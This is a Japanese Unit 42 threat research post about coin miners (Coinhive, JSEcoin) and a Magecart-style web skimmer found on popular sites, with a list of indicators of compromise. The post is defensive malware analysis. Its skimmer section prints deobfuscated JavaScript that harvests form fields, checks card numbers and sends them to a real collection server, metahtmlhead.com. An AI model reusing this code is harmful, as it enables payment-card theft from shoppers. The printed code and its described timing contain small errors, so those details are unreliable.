[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/malicious-coinminers-web-skimmer/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/malicious-coinminers-web-skimmer/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# 悪意のあるコインマイナーやWebスキマーに感染したAlexaランキング上位サイト

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 4 分で読めます  
Related Products  
[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/ja/product-category/advanced-threat-prevention-ja/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/ja/product-category/next-generation-firewall-ja/ "Next-Generation Firewall")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Tao Yan](https://unit42.paloaltonetworks.com/ja/author/tao-yan/)
  * [Jin Chen](https://unit42.paloaltonetworks.com/ja/author/jin-chen/)
  * [Taojie Wang](https://unit42.paloaltonetworks.com/ja/author/taojie-wang/)
  * [Zhanglin He](https://unit42.paloaltonetworks.com/ja/author/zhanglin-he/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2020年10月1日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Coinhive](https://unit42.paloaltonetworks.com/ja/tag/coinhive-ja/)
  * [Cryptocurrency](https://unit42.paloaltonetworks.com/ja/tag/cryptocurrency-ja/)
  * [JSEcoin](https://unit42.paloaltonetworks.com/ja/tag/jsecoin-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/malicious-coinminers-web-skimmer/?pdf=download&lg=ja&_wpnonce=4a1c13b7e7 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/malicious-coinminers-web-skimmer/?pdf=print&lg=ja&_wpnonce=4a1c13b7e7 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=悪意のあるコインマイナーやWebスキマーに感染したAlexaランキング上位サイト&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalicious-coinminers-web-skimmer%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalicious-coinminers-web-skimmer%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalicious-coinminers-web-skimmer%2F&title=悪意のあるコインマイナーやWebスキマーに感染したAlexaランキング上位サイト "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalicious-coinminers-web-skimmer%2F&text=悪意のあるコインマイナーやWebスキマーに感染したAlexaランキング上位サイト "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalicious-coinminers-web-skimmer%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=悪意のあるコインマイナーやWebスキマーに感染したAlexaランキング上位サイト%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmalicious-coinminers-web-skimmer%2F "Share in Mastodon")

## **概要**

最近Unit 42ではAlexa上の世界上位1万件のWebサイトについて、脅威ハンティングキャンペーンを行いました。AlexaランキングはWebサイトの人気度をはかるもので、閲覧者のインタラクションや閲覧数に基づいてランキングが算出されます。今回の脅威ハンティングでは脅威による影響を受けたサイトが4つ見つかりました。この概要を表1に概要を記載します。以下の分析では、悪意のあるアクティビティについて詳しく説明し、CPUリソースを乗っ取って暗号通貨をマイニングする悪意のあるコインマイナーのほか、ユーザーを悪意のあるサイトに誘導する悪意のある外部リンク、チェックアウトフォームから支払いカードの詳細を盗むように設計されたWebスキマー攻撃などについて取り上げていきます。

|------------------------|------------|--------------|------------------------|-------------------------------------------------------------------|
| 影響を受けたドメイン             | 影響の種類      | 攻撃の種類        | Alexaランク（2020年6月15日現在） | サイトの種類                                                            |
| libero\[.\]it          | 悪意のある外部リンク | 悪意のあるコインマイナー | 607                    | イタリアでAlexaランク1位のWebサイト。Webメール、検索エンジン、ニュースなど、さまざまな種類のコンテンツとサービスを提供 |
| pojoksatu\[.\]id       | 侵害されたサイト   | 悪意のあるコインマイナー | 1494                   | インドネシアのニュースサイト                                                    |
| www\[.\]heureka\[.\]cz | 悪意のある外部リンク | Webスキミング     | 5204                   | 中央・東ヨーロッパ市場で最大のeコマースプラットフォーム                                      |
| zoombangla\[.\]com     | 侵害されたサイト   | 悪意のあるコインマイナー | 6579                   | バングラデシュのニュースサイト                                                   |

*表1 影響を受けたトップAlexaサイトの概要*

パロアルトネットワークス製品をご利用のお客様は前述の脅威から[URLフィルタリング](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/web-security)とクラウド配信のセキュリティサブスクリプション[脅威防御](https://www.paloaltonetworks.jp/products/secure-the-network/subscriptions/threat-prevention)により保護されています。

## **侵害されたサイト**

#### 悪意のあるコインマイナー

[Coinhive](https://unit42.paloaltonetworks.jp/caught-in-the-act-from-intrusive-coin-miners-to-scam-websites/)はMoneroブロックチェーン用JavaScriptマイナーを提供するブラウザーマイニングサービスでしたが、サイバー犯罪者に広く悪用されたことが一因となり、2019年3月に[シャットダウン](https://www.zdnet.com/article/coinhive-cryptojacking-service-to-shut-down-in-march-2019/)されました。ですが、Coinhiveのマイナースクリプトを提供しているWebサイトはまだ存在しています。coinhive.min\[.\]jsとJSEcoinの2つです。下の図1は、侵害されたWebサイト（zoombangla\[.\]com）でコインマイナーを起動するのに発行されたコマンドを示しています。

![侵害されたWebサイトのソースzoombangla\[.\]comに悪意のあるコインマイナーを起動して被害者のCPUの使用量などのパラメーターを設定するために使用されるコマンドが表示されています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-42.png) 図 1 定義されたパラメータでCoinhiveマイナーを開始するコマンド このマイナーは、以下のコードでユーザーのCPUをどのように使うかや、マイニング用スレッド数などを制御することができます。このほか、対象CPUをどの程度使うかについても制御可能です。パラメータに使用できるオプションを表2に示します。奇妙なことに上記のコードはマイナーが感染デバイスのバッテリを急速に枯渇させるような構成にしてありました。おそらくこの攻撃者は侵害に成功した対象デバイスを最大限利用してやろうと目論んだのでしょう。ほとんどの攻撃者は侵害デバイスの電力消費量を低く抑えることで検出を回避し、不正な金儲けを継続しようとするものですが、この事例では慌ててマイニングをして、適切な構成がされていなかったようです。

|------------------|--------------------------------|
| Throttle (スロットル) | CPU usage limit to (CPU使用率の制限) |
| 0 (デフォルト)        | 100%                           |
| 0.3              | 80%                            |
| 0.5              | 50% -- 70%                     |

*表2 スロットルとCPU使用率マッピング用のパラメータ*

さて次は別のWebサイト（pojoksatu\[.\]id）の事例を以下に示します。このサイトでもCoinhiveマイニングスクリプトを提供してコマンドを開始していました。

![侵害されたWebサイトpojoksatu\[.\]idからのソース。悪意のあるコインマイナーを起動するために使用されるデフォルトのコマンドを示しています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-43.png) 図 2 デフォルトのパラメータ設定でCoinhiveマイナーを開始しているるコマンド ユーザーが上記のサイトのいずれかにアクセスすると、コインマイニングスクリプトが自動的に実行され、攻撃者のためのマイニングを開始します。この結果、図3に示すようにユーザーのCPU負荷は増加します。

![悪意のあるコインマイナーの影響を受けた場合のCPU負荷アクティビティの例](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-44.png) 図 3 マイニングアクティビティによるCPU負荷

pojoksatu\[.\]idとzoombangla\[.\]comには合わせて**60以上のURLページ**にCoinhiveマイニングスクリプトが挿入されていました。詳細については本稿末尾の付録を御覧ください。

#### 悪意のある外部リンク

外部リンクのセキュリティはこれまでにまして重要になっています。メールサービス側のスパムを含む悪意のあるメッセージの発見能力が向上したために、攻撃者がそれらの代わりに外部リンクを使用したオープンリダイレクトを使うようになってきているからです。攻撃者が正当なWebサイトの投稿に悪意のあるURLを含めたとして、それを疑わしいと察知できる閲覧者はほぼいないでしょう。ユーザーがリンクをクリックしたり、まずはリンク先を確認しようとリンクにカーソルを合わせただけで、リンクに有効なWebサイトが表示されたとしても、結局は攻撃者がリダイレクトさせたい悪意のあるサイトに飛ばされてしまいます。その後ユーザーは、悪意のあるコインマイナーなど、ある種のマルウェアに感染したり個人情報を窃取される可能性があります。

次の図4は、libero\[.\]it上で中古車販売を行っている正当なWebサイトです。このサイトでは車両を検索・比較できるようになっていますが、図5-7に示すように、攻撃者は悪意のあるリンクを車の広告に挿入することで、車に関心のある閲覧者を悪意のあるサイトにリダイレクトして、JSEcoinコインマイニングスクリプトを挿入していました。なおJSEcoinプラットフォームは2020年4月4日に閉鎖されていますので、この点はご留意ください。スクリプト自体は実行されますが攻撃者はスクリプトからコインを収集することはできなくなっています。

![これは、攻撃者が悪意のある外部リンクを、ここに示す正規の中古車Webサイトなどの侵害されたWebサイトに挿入する方法の例を示しています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-45.png) 図 4 libero\[.\]itの外部リンク。閲覧者を侵害されたサイトにリダイレクトしている このソースページは次のようになっています。

![この画像は、libero\[.\]itを指すすべての外部リンクを強調表示しています。リンクは正当に見えますがリンクをクリックするとユーザーは悪意のあるサイトにリダイレクトされます。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-46.png) 図 5 悪意のあるリンクを含むページのソースコード 図5に示すように、強調表示されているすべての外部リンクはlibero\[.\]itに向けられています。この車についてもっと知りたければリンクをクリックする必要がありますが、そうすることで悪意のあるサイトにリダイレクトされます。

![赤で強調表示した領域は、ユーザーを正当なWebサイトから悪意のあるサイトに誘導するリダイレクトチェーンの仕組みを示しています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-47.png) 図 6 リダイレクトチェーン

このサイトが悪意のあるコインマイナーが挿入される場所です。
![これは、www.clicautosate\[.\]itのソースを示しています。ここでコマンドはJSEcoinの悪意のあるコインマイナーを開始します。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-48.png) 図 7 JSEcoinマイナーを開始するコマンド

#### Webスキミング

Eスキミング、あるいはMagecart攻撃とも呼ばれるWebスキミング攻撃は、あらかじめWebサイトの支払いページを侵害して悪意のあるコードが埋め込んでおき、チェックアウトフォームが入力された段階で支払いカードの詳細を盗むという攻撃手法です。

Alexaランキング上位のウェブサイトで見つけたサンプルは、別の外部リンクのセキュリティ問題に由来するものでした。heureka\[.\]cz 自体はECサイトで、このサイトでCOVID-19対策製品（ウェブサイトのトップ検索キーワード）を検索すると関連製品一覧が表示されます。
![AlexaのトップランクのWebサイトにあるCOVID-19対策製品の例。外部リンクのセキュリティ由来の問題により、こうした人気製品一覧をチェックしているユーザーが攻撃にさらされる](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-49.png) 図 8 製品例

この商品の後ろにはストアが1つ掲載されていて、閲覧者はそのストアから製品を買うことができます。

![これは、heureka\[.\]czのリンクを示しています。一見COVID-19対策製品を宣伝しているように見えますが、実際にはユーザーを侵害されたサイトにリダイレクトしています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-50.png) 図 9 heureka\[.\]cz内の侵害されたサイトへのリンク このソースページは次のようになっています。

![強調表示されている悪意のあるリンクを含むheureka\[.\]czのページのソースコード。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-51.png) 図 10 悪意のあるリンクを含むページのソースコードを強調表示している このストアを訪れたユーザーは悪意のあるサイトにリダイレクトされます。

![赤で強調表示されている部分はユーザーがどのようにして正当なWebサイトから悪意のあるサイトにリダイレクトされるかを示しています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-52.png) 図 11 リダイレクトチェーン

図12に示すとおり、このサイトは残念ながら全体が難読化された悪意のあるスキミング用スクリプトで埋め尽くされていました。
![私たちが調査した事例は、ユーザーのリダイレクト先となる悪意のあるサイトは難読化された悪意のあるスキマースクリプトだらけでした。難読化されているのでこれらがどのような動作を引き起こすか予測することは困難です。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-53.png) 図 12 難読化されたスキミング用スクリプト

難読化されているとどのような動作が発生するかを予測するのが難しいので、まずはこれを解除してやる必要がありました。難読化を解除すると次の一連の関数が見つかりました。これらの関数では、密かにユーザーによる支払いカード情報の入力を監視し、リモートの攻撃者サーバーに送信しています。

function G1ED7H(XYRUDR) { var ZU554M = 0; XYRUDR = XYRUDR\["split"\](""); if (XYRUDR\["length"\] \< 13 || XYRUDR\["length"\] \> 19) return false; for (var E9VLQF = XYRUDR\["length"\] - 1; E9VLQF \>= 0; E9VLQF--) { if (!XYRUDR\[E9VLQF\]\["match"\](/\[0-9\]/)) return false; if (!(E9VLQF % 2)) { ZU554M += (XYRUDR\[E9VLQF\] \* 2 \> 9) ? XYRUDR\[E9VLQF\] \* 2 - 9 : XYRUDR\[E9VLQF\] \* 2 } else { ZU554M += XYRUDR\[E9VLQF\] \* 1 } } return !(ZU554M % 10) }

|-------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | function G1ED7H(XYRUDR) { var ZU554M = 0; XYRUDR = XYRUDR\["split"\](""); if (XYRUDR\["length"\] \< 13 || XYRUDR\["length"\] \> 19) return false; for (var E9VLQF = XYRUDR\["length"\] - 1; E9VLQF \>= 0; E9VLQF--) { if (!XYRUDR\[E9VLQF\]\["match"\](/\[0-9\]/)) return false; if (!(E9VLQF % 2)) { ZU554M += (XYRUDR\[E9VLQF\] \* 2 \> 9) ? XYRUDR\[E9VLQF\] \* 2 - 9 : XYRUDR\[E9VLQF\] \* 2 } else { ZU554M += XYRUDR\[E9VLQF\] \* 1 } } return !(ZU554M % 10) } |

この関数はLuhnアルゴリズムによるクレジットカード番号検証に使われています。Luhnアルゴリズムは、[クレジットカード番号](https://en.wikipedia.org/wiki/Payment_card_number)のようなさまざまな識別番号の検証に広く利用されているものです。

function XYRUDR() { var P23WTA = document\['all'\] || document\['getElementsByTagName'\](\*); for (E9VLQF = 0; E9VLQF \< P23WTA\['length'\]; E9VLQF++) { if (".input.select.form.button.a.img."\["indexOf"\]("." + P23WTA\[E9VLQF\]\["tagName"\]\["toLowerCase"\]() + ".") \>= 0 \&\& !P23WTA\[E9VLQF\]\["r"+Math\["random"\]()\]) { P23WTA\[E9VLQF\]\["r"+Math\["random"\]()\] = 1; XCT5WY(P23WTA\[E9VLQF\], "mousedown"); } setTimeout(XYRUDR, 99) }

|-------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | function XYRUDR() { var P23WTA = document\['all'\] || document\['getElementsByTagName'\](\*); for (E9VLQF = 0; E9VLQF \< P23WTA\['length'\]; E9VLQF++) { if (".input.select.form.button.a.img."\["indexOf"\]("." + P23WTA\[E9VLQF\]\["tagName"\]\["toLowerCase"\]() + ".") \>= 0 \&\& !P23WTA\[E9VLQF\]\["r"+Math\["random"\]()\]) { P23WTA\[E9VLQF\]\["r"+Math\["random"\]()\] = 1; XCT5WY(P23WTA\[E9VLQF\], "mousedown"); } setTimeout(XYRUDR, 99) } |

ここがスキマーの開始部分です。99秒ごとに実行されて関数 XYRUDR を呼び出します。関数 XYRUDR は \[input, select, form, button, a, img\] に含まれるタグをすべて検索します。

function XCT5WY(P23WTA, "mousedown") { P23WTA\["addEventListener"\] ? P23WTA\["addEventListener"\](""mousedown", GB14BD, false) : P23WTA\["attachEvent"\]("onmousedown", GB14BD) }

|-----------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | function XCT5WY(P23WTA, "mousedown") { P23WTA\["addEventListener"\] ? P23WTA\["addEventListener"\](""mousedown", GB14BD, false) : P23WTA\["attachEvent"\]("onmousedown", GB14BD) } |

前述のタグの mousedown イベントリスナーを設定します。

function GB14BD() { var P23WTA = document\["all"\] || document\["getElementsByTagName"\]("\*"); E9VLQF, N798NL = "", E; ITCHLA = ""; for (E9VLQF = 0; E9VLQF \< P23WTA\["length"\]; E9VLQF++) { if (".input.select."\["indexOf"\]("." + P23WTA\[E9VLQF\]\["tagName"\]\["toLowerCase"\]() + ".") \>= 0 \&\& P23WTA\[E9VLQF\]\["value"\]) { if (G1ED7H(P23WTA\[E9VLQF\]\["value"\]\["split"\](" ")\["join"\](""))) { ITCHLA = P23WTA\[E9VLQF\]\["value"\]\["split"\](" ")\["join"\](""); } N798NL += \& + (P23WTA\[E9VLQF\]\["name"\] || P23WTA\[E9VLQF\]\["id"\] || "i\_" + E9VLQF) + "=" + CVZLRD(P23WTA\[E9VLQF\]) } } if (ECUOWQ != N798NL \&\& ITCHLA) { ECUOWQ = N798NL; MAU1KL() } }

|----------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | function GB14BD() { var P23WTA = document\["all"\] || document\["getElementsByTagName"\]("\*"); E9VLQF, N798NL = "", E; ITCHLA = ""; for (E9VLQF = 0; E9VLQF \< P23WTA\["length"\]; E9VLQF++) { if (".input.select."\["indexOf"\]("." + P23WTA\[E9VLQF\]\["tagName"\]\["toLowerCase"\]() + ".") \>= 0 \&\& P23WTA\[E9VLQF\]\["value"\]) { if (G1ED7H(P23WTA\[E9VLQF\]\["value"\]\["split"\](" ")\["join"\](""))) { ITCHLA = P23WTA\[E9VLQF\]\["value"\]\["split"\](" ")\["join"\](""); } N798NL += \& + (P23WTA\[E9VLQF\]\["name"\] || P23WTA\[E9VLQF\]\["id"\] || "i\_" + E9VLQF) + "=" + CVZLRD(P23WTA\[E9VLQF\]) } } if (ECUOWQ != N798NL \&\& ITCHLA) { ECUOWQ = N798NL; MAU1KL() } } |

イベントがトリガーされるとこの関数を呼び出してタグの値を取得します。

function MAU1KL() { var ZU554M = "https://"; Y3V4T2 = String; ZU554M += "metahtmlhead.com" + "/" + "folder" + "/" + "ip" + "/" + "zxc" + "." + "php"; var P23WTA = document\["createElement"\]("script"); N798NL = document\["getElementsByTagName"\]("html")\[0\]; P23WTA = N798NL\["insertBefore"\](P23WTA, null); P23WTA\["src"\] = ZU554M + "?r=" + MLEMCG + ECUOWQ + "\&" + "c" + "c" + "=" + ITCHLA }

|-------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | function MAU1KL() { var ZU554M = "https://"; Y3V4T2 = String; ZU554M += "metahtmlhead.com" + "/" + "folder" + "/" + "ip" + "/" + "zxc" + "." + "php"; var P23WTA = document\["createElement"\]("script"); N798NL = document\["getElementsByTagName"\]("html")\[0\]; P23WTA = N798NL\["insertBefore"\](P23WTA, null); P23WTA\["src"\] = ZU554M + "?r=" + MLEMCG + ECUOWQ + "\&" + "c" + "c" + "=" + ITCHLA } |

この関数を利用して収集サーバーにクレジットカード情報を送信します。

要約すると、このwebスキマーのワークフローは次のとおりです。

1. \[input, select, form, button, a, img\]の各タグ用にイベントリスナーを追加
2. 数字文字列がクレジットカード検証チェックに合格すれば情報を送出
3. 収集サーバーのURLとパラメータを作成し情報を送信

攻撃が成功するとクレジットカード番号、住所など、すべてのユーザー情報がリモートの攻撃者サーバーに送信されます。

**収集サーバー：metahtmlhead\[.\]com**
![収集サーバー：metahtmlhead\[.\]com赤で囲んだ部分は、Webスキマー攻撃中、収集サーバーに送信される収集済みクレジットカード情報を示しています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-54.png) 図 13 収集サーバーに送信されるクレジットカード情報

## **URLフィルタリング分析**

![この円グラフは、私たちが観察した、脅威の影響を受けたサイトを訪れた閲覧者の地理的分布を示しています。大多数の閲覧は西ヨーロッパからのものでしたが、米国東部・西部もかなりの割合をしめています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/09/word-image-55.png) 図 14 弊社URLフィルタリングを利用している顧客の地理的分布

この円グラフは、私たちが観察した、脅威の影響を受けたサイトを訪れた閲覧のおおよその地理的分布を示すものです。大多数は明らかに西ヨーロッパからの閲覧で、米国東部・西部からの閲覧もかなりの割合をしめています。この円グラフは、被害者となりうる閲覧者が世界中の広い範囲におよんでいることを示しています。

## 結論

今回の調査からは人気もあって一見評判の良いWebサイトであっても慎重に閲覧する必要があることが明らかになりました。なぜならそうしたサイトは悪意のあるコインマイニングやWebスキミングを集中して狙っている攻撃者にとっても最も高い収入をもたらしてくれるサイトだからです。ですから外部サイトを開くようなリンクをクリックするときは、たどりついたサイトのURL全体に注意を払い、いまいる場所が自分が意図したサイトかどうかを確認する必要があります。悪意のあるコインマイナーを回避するシンプルな方法は、エンドポイントセキュリティをインストールしてブラウザやシステムにすべての更新プログラムを適用しておくことです。

パロアルトネットワークス製品をご利用のお客様は前述の脅威から[URLフィルタリング](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/web-security)とクラウド配信のセキュリティサブスクリプション[脅威防御](https://www.paloaltonetworks.jp/products/secure-the-network/subscriptions/threat-prevention)により保護されています。

## IoC

* zoombangla\[.\]com/career/
* bandung\[.\]pojoksatu\[.\]id/politik-2/pemilihan-legislatif/#terpopuler
* clickout\[.\]libero\[.\]it/auto-furgoni-in-vendita/AVzIAHFZ2VJ8PlgGhbdOweEIAAABZw
* www\[.\]heureka\[.\]cz/exit/ovci-veci-cz/3773569318/?z=2\&p=29\&tb=0
* www\[.\]ovci-veci\[.\]cz
* www\[.\]clicautousate\[.\]it/auto/mini-cabrio-torino-1855861\[.\]php?utm\_source=libero.it
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/made-wirawan-waspadai-motivasi-berlipat/
* bandung\[.\]pojoksatu\[.\]id/lifestyle/wisata/
* bandung\[.\]pojoksatu\[.\]id/persib/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/partai-pendukung-ridwan-kamil-kuasai/
* bandung\[.\]pojoksatu\[.\]id/#mingguini
* bandung\[.\]pojoksatu\[.\]id/bandung-barat
* bandung\[.\]pojoksatu\[.\]id//id/corporate-social-responsibility\[.\]html
* bandung\[.\]pojoksatu\[.\]id//id\[.\]html
* bandung\[.\]pojoksatu\[.\]id/iklan/bjb-lebaran/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/warganet-heboh-amanda-manopo-upload-foto/feed/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/pencipta-lagi-syantik-bantah-ambil-jargon/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/siti-badriah-langsung-jawab-sindiran/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/09
* bandung\[.\]pojoksatu\[.\]id/olahraga/top-soccer/
* bandung\[.\]pojoksatu\[.\]id/jabar-area/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/09/puncaki-daftar-topscorer-ini-reaksi-ezechiel/
* bandung\[.\]pojoksatu\[.\]id/pojok-info/
* bandung\[.\]pojoksatu\[.\]id/politik-2/pilgub-jabar/
* bandung\[.\]pojoksatu\[.\]id//id/corporate-website/kontak-kami\[.\]html
* bandung\[.\]pojoksatu\[.\]id/lifestyle/kuliner/
* bandung\[.\]pojoksatu\[.\]id//id/corporate-website/rate-dan-biaya/prime-lending-rate\[.\]html
* bandung\[.\]pojoksatu\[.\]id/read/tag/berita-selebritis/
* bandung\[.\]pojoksatu\[.\]id/bandung/
* bandung\[.\]pojoksatu\[.\]id/?p%3D177978
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/02/bagaimana-cara-membuat-si-dia-terpuaskan/
* bandung\[.\]pojoksatu\[.\]id/politik/
* bandung\[.\]pojoksatu\[.\]id//id/corporate-website\[.\]html
* bandung\[.\]pojoksatu\[.\]id/bisnis/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/vincenzo-alberto-annese-persib-vs-psis-duel
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/09/kapolda-jabar-apresiasi-1-800-bandit-jalanan-diamankan-jelang-asian/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/jennifer-lopez-dan-alex-rodriguez
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/kroasia-menuju-semifinal
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/mario-gomez-demi-3-poin-persib-main/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/livorno-maaf-juve-kami-sudah-dapatkan-cristiano-lebih/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/mantap-lagu-exo-akan-dimainkan-di-final-piala-dunia/
* bandung\[.\]pojoksatu\[.\]id/politik-2/pilkada-serentak/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/warganet-heboh-amanda-manopo-upload-foto/#respond
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/jika-mediasi-gagal-sule-pasrah-dicerai/
* bandung\[.\]pojoksatu\[.\]id/kabupaten-bandung/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/09/made-wirawan-waspadai-permainan-cepat/
* bandung\[.\]pojoksatu\[.\]id//en\[.\]html
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/07/gairah-seks-menurun-sikat-5-buah-ini-sebelum/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/sah-ade-yasin-iwan-setiawan-menang-di-pilbup-bogor/
* bandung\[.\]pojoksatu\[.\]id/selebritis/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/06/brotherhood-meradang-keluarkan-maklumat-soal/
* bandung\[.\]pojoksatu\[.\]id/olahraga/
* bandung\[.\]pojoksatu\[.\]id/#grve-polling-modal
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/09/kpu-jabar-klaim-tak-ada-celah-gugat-hasil-rekap-suara/
* bandung\[.\]pojoksatu\[.\]id/comments/feed/
* bandung\[.\]pojoksatu\[.\]id/olahraga/moto-gp/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/rekap-suara-pilgub-jabar-diprediksi-minggu/
* bandung\[.\]pojoksatu\[.\]id/read/2018/07/08/pemkot-bandung-bakal-tertibkan-minimarket/
* bandung\[.\]pojoksatu\[.\]id/lifestyle/belanja/
* bandung\[.\]pojoksatu\[.\]id/read/editor/redaksi3/
